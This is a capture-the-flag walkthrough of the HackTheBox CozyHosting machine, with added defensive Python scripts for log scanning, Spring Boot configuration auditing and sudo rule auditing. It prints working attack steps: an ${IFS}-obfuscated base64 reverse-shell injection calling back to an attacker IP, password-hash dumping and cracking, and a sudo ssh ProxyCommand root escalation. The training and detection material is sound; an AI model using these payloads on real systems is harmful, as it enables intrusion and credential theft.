HackTheBox (CozyHosting)
This walkthrough is for the CozyHosting machine from HackTheBox.
Target
CozyHosting is an Ubuntu system that is hosting a Spring Boot Web Application. In the following demonstration, we are starting the attack with a simple nmap scan to search for any open ports.
The nmap results are the following:
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nothing interesting; let's move forward.
Gobuster scan:
- /index (Status: 200) [Size: 12706]
- /login (Status: 200) [Size: 4431]
- /admin (Status: 401) [Size: 97]
- /logout (Status: 204) [Size: 0]
- /error (Status: 500) [Size: 73] <---
We found the /error route, which prints a "Whitelabel Error Page", the default error page of Spring Boot web applications. Therefore, this application is running Spring Boot.
Actuator endpoints in Spring Boot applications:
Next, we navigate to the /actuator/sessions actuator route of the application and obtain the administrator's session cookie. Using BurpSuite, we intercept the request and inject the cookie, which gives us access to the admin panel.
In the admin panel, we are presented with the following user interface:
We successfully logged in as K. Anderson, the administrator.
At the bottom of the page, two input fields let the administrator add a host for automatic patching. From a penetration tester's perspective, these fields can be used to inject a malicious payload and obtain a reverse shell. Afterwards, we can ssh into the machine with credentials.
- The payload can be injected through the username input field with BurpSuite.
- Now, we can use the following payload:
echo "bash -i >& /dev/tcp/<your-ip>/<your-port> 0>&1" | base64 -w 0
echo${IFS%??}"<insert payload here>"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;
*Note: Payload injection can also be done through the input fields without using BurpSuite.
Then, we start a netcat listener:
nc -nvlp 9001 (any port)
I have chosen port 9001; the previous payload needs to be modified according to the port you use.
echo "bash -i >& /dev/tcp/10.10.23.253/9001 0>&1" | base64 -w 0
Optional - create a stable shell with the following steps:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z
stty raw -echo; fg
Now, we have a stable reverse shell.
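From the defender's side, the part of the chain described above leaves two traces: an unauthenticated client reading an actuator endpoint, and a command injection whose whitespace is hidden with ${IFS} parameter expansion. The following Python script is an added example, not part of the original walkthrough, that runs both checks over constructed nginx access-log lines (combined format). It URL-decodes each request target, flags the actuator index and sensitive actuator endpoints that were served with a 200, and normalises ${IFS...} expansions before looking for a base64-decode-into-shell pipeline. The request path /patch, the client addresses and the log lines are constructed; a POST body is not part of the standard access log, so in practice the same pattern checks would run over whatever request field the application itself logs.

```python
"""Added example: flag Spring Boot actuator enumeration and ${IFS}-obfuscated
command injection in nginx access-log lines. Sample lines are constructed."""
import re
from urllib.parse import unquote

# nginx "combined" format: client, ident, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Default Spring Boot actuator base path; the endpoint id follows the slash.
ACTUATOR_RE = re.compile(r"^/actuator(?:/(?P<endpoint>[^/?]+))?(?=[/?]|$)")
# Endpoints that leak secrets or session material when reachable unauthenticated
# (sessions is the one used above; it exists only when Spring Session is present).
SENSITIVE_ACTUATORS = {"sessions", "env", "heapdump", "beans", "mappings"}

# Shell parameter expansions of IFS used to smuggle whitespace past filters;
# matched after URL-decoding, so an encoded %24%7BIFS... form is caught as well.
IFS_RE = re.compile(r"\$\{IFS[^}]*\}|\$IFS")
# Decode-then-execute pipeline, checked once the IFS expansions are normalised.
DECODE_SHELL_RE = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")

# Constructed sample: an actuator walk, a session read, an obfuscated
# injection in the "username" parameter, and one benign request.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /actuator HTTP/1.1" 200 634
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /actuator/sessions HTTP/1.1" 200 148
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /patch?host=localhost&username=admin;echo%24%7BIFS%25%3F%3F%7DaWQ%3D%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D-d%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash HTTP/1.1" 302 0
192.168.1.20 - - [01/Jan/2024:10:01:00 +0000] "GET /index HTTP/1.1" 200 12706
"""


def analyze(line):
    """Return (client_ip, [findings]) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))
    findings = []
    am = ACTUATOR_RE.match(target)
    if am:
        endpoint = am.group("endpoint")
        if endpoint is None:
            findings.append("actuator index enumerated")
        elif endpoint in SENSITIVE_ACTUATORS and m.group("status") == "200":
            findings.append(f"sensitive actuator served: /actuator/{endpoint}")
    if IFS_RE.search(target):
        findings.append("IFS whitespace evasion")
    # Replace every IFS expansion with a space so the pipeline reads normally.
    if DECODE_SHELL_RE.search(IFS_RE.sub(" ", target)):
        findings.append("base64-decoded shell pipeline")
    return m.group("ip"), findings


def scan(log_text):
    """Map each client IP to the findings raised by its requests."""
    report = {}
    for line in log_text.splitlines():
        result = analyze(line)
        if result and result[1]:
            report.setdefault(result[0], []).extend(result[1])
    return report


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(hits))
```

Both signals are cheap enough to run as a scheduled pass over access logs; the actuator check on its own is worth an alert, because an unauthenticated 200 from /actuator/sessions is the exact condition that let the session cookie above be read.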
- Listing the directory with ls, we find a .tar file.
- Download the file to your local machine:
wget http://<your ip>/<file_name>
- The file is successfully downloaded.
- Open the downloaded file with jd-gui:
jd-gui <file_name>
- Navigating to classes and then templates, we find the important application.properties configuration file.
- The file contains the PostgreSQL configuration, so we can connect to the database:
psql -h 127.0.0.1 -U postgres
select * from users;
Voila! We got our user hashes!
We can crack the admin hash using john with the rockyou.txt wordlist:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using the recovered password, we can ssh in as user josh:
ssh josh@cozyhosting.htb
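The application.properties file recovered above is what turns a shell as the web service into database credentials, and the same file is where the actuator exposure is configured. The following Python script is an added example, not the project's own code, that audits a Spring Boot application.properties for both issues: sensitive actuator endpoints exposed over HTTP (honouring the include/exclude lists and per-endpoint enabled flags), and literal credentials stored in the file rather than referenced through a ${...} placeholder resolved at start-up. The two property files are constructed to show a weak configuration next to a corrected one; the database name appdb and the DB_PASSWORD variable are assumptions.

```python
"""Added example: audit a Spring Boot application.properties for the two
weaknesses used above, wide-open actuator exposure and a literal database
password packaged in the application archive. Both property files are
constructed, not the CozyHosting file."""
import re

WEAK_PROPERTIES = """\
server.port=8080
spring.datasource.url=jdbc:postgresql://localhost:5432/appdb
spring.datasource.username=postgres
spring.datasource.password=EXAMPLE_PLAINTEXT_PASSWORD
management.endpoints.web.exposure.include=*
"""

HARDENED_PROPERTIES = """\
server.port=8080
spring.datasource.url=jdbc:postgresql://localhost:5432/appdb
spring.datasource.username=postgres
# secret injected from the environment at start-up, not baked into the jar
spring.datasource.password=${DB_PASSWORD}
management.endpoints.web.exposure.include=health
"""

# Endpoints whose output is sensitive; sessions exists only with Spring Session.
SENSITIVE_ENDPOINTS = {"sessions", "env", "heapdump", "beans", "mappings", "configprops"}
# A ${...} value is a placeholder resolved at runtime, not a literal secret.
PLACEHOLDER_RE = re.compile(r"^\$\{[^}]+\}$")
# key, then '=' or ':' (or whitespace) as separator, then the value
PROP_RE = re.compile(r"^([^=:\s]+)\s*[=:]?\s*(.*)$")


def parse_properties(text):
    """Minimal java .properties reader: '#'/'!' comments, '=' or ':' separators."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = PROP_RE.match(line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def audit(props):
    """Return a list of findings; an empty list means neither weakness is present."""
    findings = []
    # Web exposure: current Spring Boot exposes only "health" unless include is widened.
    include = [e.strip() for e in props.get("management.endpoints.web.exposure.include", "health").split(",")]
    exclude = {e.strip() for e in props.get("management.endpoints.web.exposure.exclude", "").split(",") if e.strip()}
    candidates = SENSITIVE_ENDPOINTS if "*" in include else SENSITIVE_ENDPOINTS & set(include)
    # An exposed endpoint is only reachable if it is also enabled.
    default_enabled = props.get("management.endpoints.enabled-by-default", "true").lower() != "false"
    exposed = sorted(
        ep for ep in candidates - exclude
        if props.get(f"management.endpoint.{ep}.enabled", str(default_enabled)).lower() == "true"
    )
    if exposed:
        findings.append("sensitive actuator endpoints reachable over HTTP: " + ", ".join(exposed))
    # Literal secrets: anything that looks like a credential and is not a placeholder.
    for key, value in props.items():
        if key.endswith((".password", ".secret")) and value and not PLACEHOLDER_RE.match(value):
            findings.append(f"plaintext secret in {key}")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_PROPERTIES), ("hardened", HARDENED_PROPERTIES)):
        print(label, audit(parse_properties(text)) or ["no findings"])
```

Run it against the properties file extracted from a build artifact before release; the weak sample produces two findings and the hardened one none. Moving the password to an environment placeholder means the archive that an attacker can download from the box no longer contains the database credential at all.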
After successfully connecting as user josh, we look for a way to escalate privileges and obtain root:
sudo -l
"User josh may run the following commands on localhost: (root) /usr/bin/ssh"
Therefore, we can execute the following GTFOBins payload to escalate to root:
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2'
whoami
cat /root/root.txt
Pwned.
Payload reference: https://gtfobins.github.io/gtfobins/ssh/#sudo
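The root step above works because the sudo rule grants /usr/bin/ssh as root with no argument restriction, and ssh will run whatever ProxyCommand it is handed. The following Python script is an added example, not part of the walkthrough, that parses sudo -l output and flags rules of that kind: a root rule for a program that executes a caller-supplied command through its own options, or a root rule with no fixed arguments at all. The sudo -l text is constructed in the shape of the line quoted above, and the COMMAND_RUNNERS set is an assumed starter set containing only ssh; it is meant to be extended from the GTFOBins sudo entries referenced on the page.

```python
"""Added example: parse the output of `sudo -l` and flag rules that give root
through a program which can be told, via its own options, to run another
command (ssh with ProxyCommand is the case above). The sample output is
constructed in the shape of the line quoted in the walkthrough."""
import os
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh
    (root) NOPASSWD: /usr/bin/systemctl status nginx
"""

# Programs with an option that executes a caller-supplied command. Assumed
# starter set; extend it from the GTFOBins sudo entries referenced above.
COMMAND_RUNNERS = {"ssh"}

# "(runas) TAG: command args", several of which may share one line, comma-separated.
RULE_RE = re.compile(r"\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>[^,]+)")


def parse_sudo_l(text):
    """Return the rules listed in the 'may run the following commands' section."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        for m in RULE_RE.finditer(line):
            words = m.group("cmd").split()
            rules.append({
                # "(root : root)" style runas specs: keep the user part only
                "runas": m.group("runas").split(":")[0].strip(),
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "binary": os.path.basename(words[0]),
                "args": words[1:],
            })
    return rules


def audit_sudo(rules):
    """Findings for rules that amount to a root shell."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        if r["binary"] in COMMAND_RUNNERS:
            findings.append(f"{r['binary']} as root: executes a caller-chosen command through its own options")
        elif not r["args"]:
            findings.append(f"{r['binary']} as root with no argument restriction")
    return findings


if __name__ == "__main__":
    for finding in audit_sudo(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

The systemctl rule in the sample is not flagged: it pins the arguments, so sudo only matches that exact invocation. The ssh rule is flagged regardless of NOPASSWD, since the password of the account that already holds the rule is all that separates josh from root; the fix is to remove the rule or replace it with a wrapper that takes no caller-controlled options.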